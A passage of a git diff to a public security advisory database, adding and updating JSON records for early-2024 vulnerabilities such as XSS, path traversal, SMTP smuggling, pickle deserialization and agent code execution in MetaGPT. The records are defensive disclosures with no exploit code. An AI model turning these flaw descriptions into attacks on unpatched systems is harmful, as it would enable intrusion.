"http://www.openwall.com/lists/oss-security/2024/01/31/4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:43:09Z", + "nvd_published_at": "2024-01-31T09:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-c3c6-f2ww-xfr2/GHSA-c3c6-f2ww-xfr2.json b/advisories/github-reviewed/2024/01/GHSA-c3c6-f2ww-xfr2/GHSA-c3c6-f2ww-xfr2.json index 3332b309e0220..0d0e921be0363 100644 --- a/advisories/github-reviewed/2024/01/GHSA-c3c6-f2ww-xfr2/GHSA-c3c6-f2ww-xfr2.json +++ b/advisories/github-reviewed/2024/01/GHSA-c3c6-f2ww-xfr2/GHSA-c3c6-f2ww-xfr2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c3c6-f2ww-xfr2", - "modified": "2024-01-24T20:55:31Z", + "modified": "2024-01-31T14:55:56Z", "published": "2024-01-24T15:30:30Z", "aliases": [ "CVE-2023-50943" @@ -9,7 +9,10 @@ "summary": "Apache Airflow: pickle deserialization vulnerability in XComs", "details": "Apache Airflow, versions before 2.8.1, have a vulnerability that allows a potential attacker to poison the XCom data by bypassing the protection of \"enable_xcom_pickling=False\" configuration setting resulting in poisoned data after XCom deserialization. This vulnerability is considered low since it requires a DAG author to exploit it. Users are recommended to upgrade to version 2.8.1 or later, which fixes this issue.\n", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-chh6-ppwq-jh92/GHSA-chh6-ppwq-jh92.json b/advisories/github-reviewed/2024/01/GHSA-chh6-ppwq-jh92/GHSA-chh6-ppwq-jh92.json new file mode 100644 index 0000000000000..f41ca380906c3 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-chh6-ppwq-jh92/GHSA-chh6-ppwq-jh92.json @@ -0,0 +1,88 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-chh6-ppwq-jh92", + "modified": "2024-01-30T23:54:26Z", + "published": "2024-01-30T23:54:26Z", + "aliases": [ + "CVE-2020-15113" + ], + "summary": "Improper Preservation of Permissions in etcd", + "details": "### Vulnerability type\nAccess Controls\n\n### Detail\netcd creates certain directory paths (etcd data directory and the directory path when provided to automatically generate self-signed certificates for TLS connections with clients) with restricted access permissions (700) by using the os.MkdirAll. This function does not perform any permission checks when a given directory path exists already.\n### Specific Go Package Affected\ngithub.com/etcd-io/etcd/pkg/fileutil\n### Workarounds\nMake sure these directories have the desired permit (700).\n\n### References\nFind out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/etcd-io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0-rc.0" + }, + { + "fixed": "3.4.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/etcd-io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.3.23" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/etcd-io/etcd/security/advisories/GHSA-chh6-ppwq-jh92" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15113" + }, + { + "type": "WEB", + "url": "https://github.com/etcd-io/etcd/commit/6be5c54c94298ae6746a574d2af8227d0c9a998b" + }, + { + "type": "WEB", + "url": "https://github.com/etcd-io/etcd/commit/e5424fc474b274c9e6b5205165015bc2035745f2" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-281" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:54:26Z", + "nvd_published_at": "2020-08-05T20:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-chj7-w3f6-cvfj/GHSA-chj7-w3f6-cvfj.json b/advisories/github-reviewed/2024/01/GHSA-chj7-w3f6-cvfj/GHSA-chj7-w3f6-cvfj.json index 3b4584774e21f..962f40c8c51d8 100644 --- a/advisories/github-reviewed/2024/01/GHSA-chj7-w3f6-cvfj/GHSA-chj7-w3f6-cvfj.json +++ b/advisories/github-reviewed/2024/01/GHSA-chj7-w3f6-cvfj/GHSA-chj7-w3f6-cvfj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-chj7-w3f6-cvfj", - "modified": "2024-01-23T14:41:50Z", + "modified": "2024-01-29T16:25:04Z", "published": "2024-01-20T21:30:25Z", "aliases": [ "CVE-2024-0521" @@ -40,6 +40,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0521" }, + { + "type": "PACKAGE", + "url": "https://github.com/PaddlePaddle/Paddle" + }, { "type": "WEB", "url": "https://huntr.com/bounties/a569c64b-1e2b-4bed-a19f-47fd5a3da453" diff --git a/advisories/github-reviewed/2024/01/GHSA-cjgm-9vc9-56mx/GHSA-cjgm-9vc9-56mx.json b/advisories/github-reviewed/2024/01/GHSA-cjgm-9vc9-56mx/GHSA-cjgm-9vc9-56mx.json index 4339a1f2861e2..6db8af5445f02 100644 --- a/advisories/github-reviewed/2024/01/GHSA-cjgm-9vc9-56mx/GHSA-cjgm-9vc9-56mx.json +++ b/advisories/github-reviewed/2024/01/GHSA-cjgm-9vc9-56mx/GHSA-cjgm-9vc9-56mx.json @@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-cjgm-9vc9-56mx", - "modified": "2024-01-24T21:48:53Z", + "modified": "2024-01-31T20:23:24Z", "published": "2024-01-24T18:31:02Z", "aliases": [ "CVE-2024-23900" ], "summary": "Path traversal vulnerability in Jenkins Matrix Project Plugin", - "details": "Jenkins Matrix Project Plugin 822.v01b_8c85d16d2 and earlier does not sanitize user-defined axis names of multi-configuration projects, allowing attackers with Item/Configure permission to create or replace any config.xml files on the Jenkins controller file system with content not controllable by the attackers.", + "details": "Jenkins Matrix Project Plugin 822.v01b_8c85d16d2 and earlier does not sanitize user-defined axis names of multi-configuration projects submitted through the `config.xml` REST API endpoint.\n\nThis allows attackers with Item/Configure permission to create or replace any `config.xml` file on the Jenkins controller file system with content not controllable by the attackers.\n\nMatrix Project Plugin 822.824.v14451b_c0fd42 sanitizes user-defined axis names of Multi-configuration project.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-cmq2-j8v8-2q44/GHSA-cmq2-j8v8-2q44.json b/advisories/github-reviewed/2024/01/GHSA-cmq2-j8v8-2q44/GHSA-cmq2-j8v8-2q44.json new file mode 100644 index 0000000000000..6ebefdf16d6e0 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-cmq2-j8v8-2q44/GHSA-cmq2-j8v8-2q44.json @@ -0,0 +1,77 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cmq2-j8v8-2q44", + "modified": "2024-01-30T23:47:48Z", + "published": "2024-01-30T23:47:48Z", + "aliases": [ + "CVE-2018-18623" + ], + "summary": "Grafana XSS in Dashboard Text Panel", + "details": "Grafana 5.3.1 has XSS via the \"Dashboard > Text Panel\" screen. NOTE: this issue exists because of an incomplete fix for CVE-2018-12099.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.0.0-beta1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-18623" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/issues/15293" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/issues/4117" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/11813" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/14984" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/releases/tag/v6.0.0" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200608-0008/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:47:48Z", + "nvd_published_at": "2020-06-02T17:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-f4qf-m5gf-8jm8/GHSA-f4qf-m5gf-8jm8.json b/advisories/github-reviewed/2024/01/GHSA-f4qf-m5gf-8jm8/GHSA-f4qf-m5gf-8jm8.json new file mode 100644 index 0000000000000..9ee5c736553e4 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-f4qf-m5gf-8jm8/GHSA-f4qf-m5gf-8jm8.json @@ -0,0 +1,88 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f4qf-m5gf-8jm8", + "modified": "2024-02-01T21:03:23Z", + "published": "2024-01-19T12:30:18Z", + "aliases": [ + "CVE-2024-21733" + ], + "summary": "Apache Tomcat vulnerable to Generation of Error Message Containing Sensitive Information", + "details": "Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.\n\nUsers are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.tomcat:tomcat" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.5.7" + }, + { + "fixed": "8.5.64" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.tomcat:tomcat" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0-M11" + }, + { + "fixed": "9.0.44" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21733" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/tomcat" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176951/Apache-Tomcat-8.5.63-9.0.43-HTTP-Response-Smuggling.html" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/19/2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-209" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:30:43Z", + "nvd_published_at": "2024-01-19T11:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-f67f-2j6r-m4c9/GHSA-f67f-2j6r-m4c9.json b/advisories/github-reviewed/2024/01/GHSA-f67f-2j6r-m4c9/GHSA-f67f-2j6r-m4c9.json index 0eb09f663b242..72de112e4f9ae 100644 --- a/advisories/github-reviewed/2024/01/GHSA-f67f-2j6r-m4c9/GHSA-f67f-2j6r-m4c9.json +++ b/advisories/github-reviewed/2024/01/GHSA-f67f-2j6r-m4c9/GHSA-f67f-2j6r-m4c9.json @@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-f67f-2j6r-m4c9", - "modified": "2024-01-24T21:50:51Z", + "modified": "2024-01-31T20:24:55Z", "published": "2024-01-24T18:31:02Z", "aliases": [ "CVE-2024-23903" ], "summary": "Non-constant time webhook token comparison in Jenkins GitLab Branch Source Plugin ", - "details": "Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier uses a non-constant time comparison function when checking whether the provided and expected webhook token are equal, potentially allowing attackers to use statistical methods to obtain a valid webhook token.", + "details": "Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier does not use a constant-time comparison function when checking whether the provided and expected webhook token are equal.\n\nThis could potentially allow attackers to use statistical methods to obtain a valid webhook token.\n\nGitLab Branch Source Plugin 688.v5fa_356ee8520 uses a constant-time comparison function when validating the webhook token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } ], "affected": [ { @@ -56,7 +59,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-697" ], "severity": "LOW", "github_reviewed": true, diff --git a/advisories/github-reviewed/2024/01/GHSA-fh38-9fgr-454w/GHSA-fh38-9fgr-454w.json b/advisories/github-reviewed/2024/01/GHSA-fh38-9fgr-454w/GHSA-fh38-9fgr-454w.json index 9d0296d7c385c..c8294ea579f50 100644 --- a/advisories/github-reviewed/2024/01/GHSA-fh38-9fgr-454w/GHSA-fh38-9fgr-454w.json +++ b/advisories/github-reviewed/2024/01/GHSA-fh38-9fgr-454w/GHSA-fh38-9fgr-454w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fh38-9fgr-454w", - "modified": "2024-01-22T21:32:16Z", + "modified": "2024-01-29T16:25:12Z", "published": "2024-01-21T06:30:22Z", "aliases": [ "CVE-2024-23725" @@ -9,7 +9,10 @@ "summary": "Cross-site Scripting in Ghost", "details": "Ghost before 5.76.0 allows XSS via a post excerpt in excerpt.js. An XSS payload can be rendered in post summaries.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-frxm-v7q3-v2wv/GHSA-frxm-v7q3-v2wv.json b/advisories/github-reviewed/2024/01/GHSA-frxm-v7q3-v2wv/GHSA-frxm-v7q3-v2wv.json index 1b753584ced86..e1f1a4cbc065d 100644 --- a/advisories/github-reviewed/2024/01/GHSA-frxm-v7q3-v2wv/GHSA-frxm-v7q3-v2wv.json +++ b/advisories/github-reviewed/2024/01/GHSA-frxm-v7q3-v2wv/GHSA-frxm-v7q3-v2wv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-frxm-v7q3-v2wv", - "modified": "2024-01-26T19:58:42Z", + "modified": "2024-01-29T03:15:54Z", "published": "2024-01-20T00:30:27Z", "aliases": [ "CVE-2024-23686" @@ -86,6 +86,10 @@ "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-qqhq-8r2c-c3f5" }, + { + "type": "PACKAGE", + "url": "https://github.com/jeremylong/DependencyCheck" + }, { "type": "WEB", "url": "https://vulncheck.com/advisories/vc-advisory-GHSA-qqhq-8r2c-c3f5" diff --git a/advisories/github-reviewed/2024/01/GHSA-fw9h-cxx9-gfq3/GHSA-fw9h-cxx9-gfq3.json b/advisories/github-reviewed/2024/01/GHSA-fw9h-cxx9-gfq3/GHSA-fw9h-cxx9-gfq3.json index 2d8ba188d30cf..1f52901814989 100644 --- a/advisories/github-reviewed/2024/01/GHSA-fw9h-cxx9-gfq3/GHSA-fw9h-cxx9-gfq3.json +++ b/advisories/github-reviewed/2024/01/GHSA-fw9h-cxx9-gfq3/GHSA-fw9h-cxx9-gfq3.json @@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-fw9h-cxx9-gfq3", - "modified": "2024-01-24T21:49:51Z", + "modified": "2024-01-31T20:24:13Z", "published": "2024-01-24T18:31:02Z", "aliases": [ "CVE-2024-23901" ], "summary": "Shared projects are unconditionally discovered by Jenkins GitLab Branch Source Plugin", - "details": "Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier unconditionally discovers projects that are shared with the configured owner group, allowing attackers to configure and share a project, resulting in a crafted Pipeline being built by Jenkins during the next scan of the group.", + "details": "GitLab allows sharing a project with another group.\n\nJenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier unconditionally discovers projects that are shared with the configured owner group.\n\nThis allows attackers to configure and share a project, resulting in a crafted Pipeline being built by Jenkins after the next scan of the group’s projects.\n\nIn GitLab Branch Source Plugin 688.v5fa_356ee8520, the default strategy for discovering projects does not discover projects shared with the configured owner group. To discover projects shared with the configured owner group, use the new trait \"Discover shared projects\".", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-g4x3-mfpj-f335/GHSA-g4x3-mfpj-f335.json b/advisories/github-reviewed/2024/01/GHSA-g4x3-mfpj-f335/GHSA-g4x3-mfpj-f335.json new file mode 100644 index 0000000000000..0e7a22ca2b2b9 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-g4x3-mfpj-f335/GHSA-g4x3-mfpj-f335.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g4x3-mfpj-f335", + "modified": "2024-01-29T22:29:06Z", + "published": "2024-01-22T06:30:32Z", + "aliases": [ + "CVE-2023-52354" + ], + "summary": "chasquid HTTP Request/Response Smuggling vulnerability", + "details": "chasquid before 1.13 allows SMTP smuggling because LF-terminated lines are accepted.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/albertito/chasquid" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52354" + }, + { + "type": "WEB", + "url": "https://github.com/albertito/chasquid/issues/47" + }, + { + "type": "WEB", + "url": "https://github.com/albertito/chasquid/commit/a996106eeebe81a292ecba838c7503cac7493e74" + }, + { + "type": "WEB", + "url": "https://blitiri.com.ar/p/chasquid/relnotes/#113-2023-12-24" + }, + { + "type": "PACKAGE", + "url": "https://github.com/albertito/chasquid" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-444" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:29:06Z", + "nvd_published_at": "2024-01-22T06:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-g7ph-8423-pf4j/GHSA-g7ph-8423-pf4j.json b/advisories/github-reviewed/2024/01/GHSA-g7ph-8423-pf4j/GHSA-g7ph-8423-pf4j.json index 2f86992d7c2f9..bd061825930b2 100644 --- a/advisories/github-reviewed/2024/01/GHSA-g7ph-8423-pf4j/GHSA-g7ph-8423-pf4j.json +++ b/advisories/github-reviewed/2024/01/GHSA-g7ph-8423-pf4j/GHSA-g7ph-8423-pf4j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g7ph-8423-pf4j", - "modified": "2024-01-22T21:20:11Z", + "modified": "2024-01-29T19:11:15Z", "published": "2024-01-22T03:30:26Z", "aliases": [ "CVE-2024-23750" @@ -9,7 +9,10 @@ "summary": "Code execution in metagpt", "details": "MetaGPT through 0.6.4 allows the QaEngineer role to execute arbitrary code because RunCode.run_script() passes shell metacharacters to subprocess.Popen.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -52,7 +55,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-94" ], "severity": "HIGH", "github_reviewed": true, diff --git a/advisories/github-reviewed/2024/01/GHSA-h3q2-8whx-c29h/GHSA-h3q2-8whx-c29h.json b/advisories/github-reviewed/2024/01/GHSA-h3q2-8whx-c29h/GHSA-h3q2-8whx-c29h.json new file mode 100644 index 0000000000000..7a6a2664d4a46 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-h3q2-8whx-c29h/GHSA-h3q2-8whx-c29h.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h3q2-8whx-c29h", + "modified": "2024-01-30T20:57:52Z", + "published": "2024-01-30T20:57:52Z", + "aliases": [ + "CVE-2024-23840" + ], + "summary": "`goreleaser release --debug` shows secrets", + "details": "### Summary\nHello 👋 \n\n`goreleaser release --debug` log shows secret values used in the in the custom publisher.\n\n\nHow to reproduce the issue:\n\n- Define a custom publisher as the one below. Make sure to provide a custom script to the `cmd` field and to provide a secret to `env` \n\n```\n#.goreleaser.yml \npublishers:\n - name: my-publisher\n # IDs of the artifacts we want to sign\n ids:\n - linux_archives\n - linux_package\n cmd: \"./build/package/linux_notarize.sh\"\n env:\n - VERSION={{ .Version }}\n - SECRET_1={{.Env.SECRET_1}}\n - SECRET_2={{.Env.SECRET_2}}\n```\n\n- run `goreleaser release --debug`\n\nYou should see your secret value in the gorelease log. The log shows also the `GITHUB_TOKEN`\n\nExample:\n\n```\nrunning cmd= ....\nSECRET_1=secret_value\n```\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/goreleaser/goreleaser" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.23.0" + }, + { + "fixed": "1.24.0" + } + ] + } + ], + "versions": [ + "1.23.0" + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/goreleaser/goreleaser/security/advisories/GHSA-h3q2-8whx-c29h" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23840" + }, + { + "type": "WEB", + "url": "https://github.com/goreleaser/goreleaser/commit/d5b6a533ca1dc3366983d5d31ee2d2b6232b83c0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/goreleaser/goreleaser" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:57:52Z", + "nvd_published_at": "2024-01-30T17:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-hpxr-w9w7-g4gv/GHSA-hpxr-w9w7-g4gv.json b/advisories/github-reviewed/2024/01/GHSA-hpxr-w9w7-g4gv/GHSA-hpxr-w9w7-g4gv.json new file mode 100644 index 0000000000000..eb1a0cfbc56c5 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-hpxr-w9w7-g4gv/GHSA-hpxr-w9w7-g4gv.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hpxr-w9w7-g4gv", + "modified": "2024-01-31T22:39:17Z", + "published": "2024-01-31T22:39:17Z", + "aliases": [ + "CVE-2024-24579" + ], + "summary": "stereoscope vulnerable to tar path traversal when processing OCI tar archives", + "details": "### Impact\nIt is possible to craft an OCI tar archive that, when stereoscope attempts to unarchive the contents, will result in writing to paths outside of the unarchive temporary directory. Specifically, use of `github.com/anchore/stereoscope/pkg/file.UntarToDirectory()` function, the `github.com/anchore/stereoscope/pkg/image/oci.TarballImageProvider` struct, or the higher level `github.com/anchore/stereoscope/pkg/image.Image.Read()` function express this vulnerability.\n\n### Patches\nPatched in v0.0.1\n\n### Workarounds\nIf you are using the OCI archive as input into stereoscope then you can switch to using an [OCI layout](https://github.com/opencontainers/image-spec/blob/main/image-layout.md) by unarchiving the tar archive and provide the unarchived directory to stereoscope.\n\n### References\n- Patch PR https://github.com/anchore/stereoscope/pull/214", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/anchore/stereoscope" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/anchore/stereoscope/security/advisories/GHSA-hpxr-w9w7-g4gv" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24579" + }, + { + "type": "WEB", + "url": "https://github.com/anchore/stereoscope/commit/09dacab4d9ee65ee8bc7af8ebf4aa7b5aaa36204" + }, + { + "type": "PACKAGE", + "url": "https://github.com/anchore/stereoscope" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:39:17Z", + "nvd_published_at": "2024-01-31T17:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-j3m6-gvm8-mhvw/GHSA-j3m6-gvm8-mhvw.json b/advisories/github-reviewed/2024/01/GHSA-j3m6-gvm8-mhvw/GHSA-j3m6-gvm8-mhvw.json index fe8879695604c..4a242b8bb5aba 100644 --- a/advisories/github-reviewed/2024/01/GHSA-j3m6-gvm8-mhvw/GHSA-j3m6-gvm8-mhvw.json +++ b/advisories/github-reviewed/2024/01/GHSA-j3m6-gvm8-mhvw/GHSA-j3m6-gvm8-mhvw.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-j3m6-gvm8-mhvw", - "modified": "2024-01-23T20:09:52Z", + "modified": "2024-01-29T14:21:39Z", "published": "2024-01-23T20:09:52Z", "aliases": [ "CVE-2023-49783" ], "summary": "No permission checks for editing/deleting records with CSV import form", - "details": "### Impact\nUsers who don't have edit or delete permissions for records exposed in a `ModelAdmin` can still edit or delete records using the CSV import form, provided they have create permissions.\n\nThe likelyhood of a user having create permissions but _not_ having edit or delete permissions is low, but it _is_ possible.\n\nNote that this doesn't affect any `ModelAdmin` which has had the import form disabled via the [`showImportForm` public property](https://api.silverstripe.org/4/SilverStripe/Admin/ModelAdmin.html#property_showImportForm), nor does it impact the `SecurityAdmin` section.\n\n#### Action may be required\n\nIf you have a custom implementation of [`BulkLoader`](https://api.silverstripe.org/4/SilverStripe/Dev/BulkLoader.html), you should update your implementation to respect permissions when the return value of [`getCheckPermissions()`](https://api.silverstripe.org/4/SilverStripe/Dev/BulkLoader.html#method_getCheckPermissions) is true.\n\nIf you are using any `BulkLoader` in your own project logic, or maintain a module which uses it, you should consider passing `true` to [`setCheckPermissions()`](https://api.silverstripe.org/4/SilverStripe/Dev/BulkLoader.html#method_setCheckPermissions) if the data is provided by users.\n\n### References\n- https://www.silverstripe.org/download/security-releases/CVE-2023-49783\n", + "details": "### Impact\nUsers who don't have edit or delete permissions for records exposed in a `ModelAdmin` can still edit or delete records using the CSV import form, provided they have create permissions.\n\nThe likelyhood of a user having create permissions but _not_ having edit or delete permissions is low, but it _is_ possible.\n\nNote that this doesn't affect any `ModelAdmin` which has had the import form disabled via the [`showImportForm` public property](https://api.silverstripe.org/4/SilverStripe/Admin/ModelAdmin.html#property_showImportForm), nor does it impact the `SecurityAdmin` section.\n\n#### Action may be required\n\nIf you have a custom implementation of [`BulkLoader`](https://api.silverstripe.org/4/SilverStripe/Dev/BulkLoader.html), you should update your implementation to respect permissions when the return value of [`getCheckPermissions()`](https://api.silverstripe.org/4/SilverStripe/Dev/BulkLoader.html#method_getCheckPermissions) is true.\n\nIf you are using any `BulkLoader` in your own project logic, or maintain a module which uses it, you should consider passing `true` to [`setCheckPermissions()`](https://api.silverstripe.org/4/SilverStripe/Dev/BulkLoader.html#method_setCheckPermissions) if the data is provided by users.\n\n**Base CVSS:** [4.3](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:F/RL:O/RC:C&version=3.1)\n**Reported by:** Guy Sartorelli from Silverstripe\n\n### References\n- https://www.silverstripe.org/download/security-releases/CVE-2023-49783\n", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2024/01/GHSA-j6vv-vv26-rh7c/GHSA-j6vv-vv26-rh7c.json b/advisories/github-reviewed/2024/01/GHSA-j6vv-vv26-rh7c/GHSA-j6vv-vv26-rh7c.json new file mode 100644 index 0000000000000..8ddcb3ee66469 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-j6vv-vv26-rh7c/GHSA-j6vv-vv26-rh7c.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j6vv-vv26-rh7c", + "modified": "2024-01-30T23:40:40Z", + "published": "2024-01-30T23:40:40Z", + "aliases": [ + "CVE-2020-10661" + ], + "summary": "HashiCorp Vault Improper Privilege Management", + "details": "HashiCorp Vault and Vault Enterprise versions 0.11.0 through 1.3.3 may, under certain circumstances, have existing nested-path policies grant access to Namespaces created after-the-fact. Fixed 